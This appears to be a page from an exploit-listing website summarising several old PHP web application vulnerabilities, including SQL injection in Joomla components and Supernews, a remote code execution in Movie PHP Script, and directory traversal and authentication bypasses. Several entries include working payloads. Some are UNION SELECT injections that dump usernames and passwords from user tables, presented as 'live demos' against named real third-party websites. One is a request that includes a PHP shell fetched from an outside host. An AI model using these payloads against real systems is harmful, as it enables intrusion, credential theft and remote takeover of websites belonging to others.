header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Joomla Component com_mosres (property_uid) SQL injection Vulnerability

A vulnerability exists in Joomla Component com_mosres (property_uid) which allows an attacker to inject malicious SQL code into the vulnerable parameter. This can be exploited to gain access to the database and potentially gain access to sensitive information. The vulnerability is present when magic_quotes_gpc is set to Off. An example of the vulnerable code is http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code], where [SQL code] is a malicious SQL code. Live demos of the vulnerability can be seen at http://ahtopolbg.com/index.php?option=com_mosres&catID=1004&regID=2&task=viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/* and http://www.velingradbg.com/index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20union%20select%201,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*.

Movie PHP Script v2.0 Remote PHP Code Execution

The vulnerable code is located in system/services/init.php, line 84. An attacker can execute arbitrary PHP code by sending a crafted request to the vulnerable script. An example of a malicious request is http://127.0.0.1/path/system/services/init.php?anticode=include 'http://www.darkmindz.com/shell/x2300_mod.txt';

Supernews 2.6 SQL Injection Vulnability

A SQL injection vulnerability exists in Supernews 2.6. An attacker can exploit this vulnerability to gain access to the database by sending maliciously crafted requests to the server. The malicious requests can be sent via the 'news_any_id' parameter in the URL. An example of such a request is: http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--

OCS Inventory NG – Directory Traversal

The Open Computer and Software (OCS) Inventory Next Generation (NG) provides relevant inventory information about system configurations and software on the network. The server can be managed using a web interface. It is possible for unauthenticated users to extract arbitrary files from the hosting system due to inadequate file handling in cvs.php. Attackers may be able to read arbitrary files from the hosting system by using a web browser.

Joomla Component Seminar Blind SQL Injection Exploit

This exploit is related to a Blind SQL Injection vulnerability in Joomla Component Seminar. The vulnerability is caused due to the improper sanitization of user-supplied input in the 'did[]' parameter of the 'index.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's database. This can be exploited to gain access to the application's database and compromise the application and its data.

Podcast Generator <= 1.2 unauthorized CMS Re-Installation Remote Exploit

Podcast Generator contains one flaw that allows an attacker to re-install the cms because of unlink() in 'delete.php' file. It's possible to delete 'config.php' to re-install the cms by setting the 'amilogged' GLOBALS variable to true.

EgyPlus 7ml <= 1.0.1 - Cookie Auth Bypass SQL injection vulnerability (CABSIV)

EgyPlus 7ml version 1.0.1 is vulnerable to a Cookie Auth Bypass SQL injection vulnerability (CABSIV). This vulnerability is due to the application not properly sanitizing user-supplied input in the 'username' and 'password' parameters of the 'login.php' script. An attacker can exploit this vulnerability to bypass authentication and gain access to the application. The attacker can also inject arbitrary SQL commands to the application, allowing them to access, modify, or delete data from the back-end database.

Recent Exploits: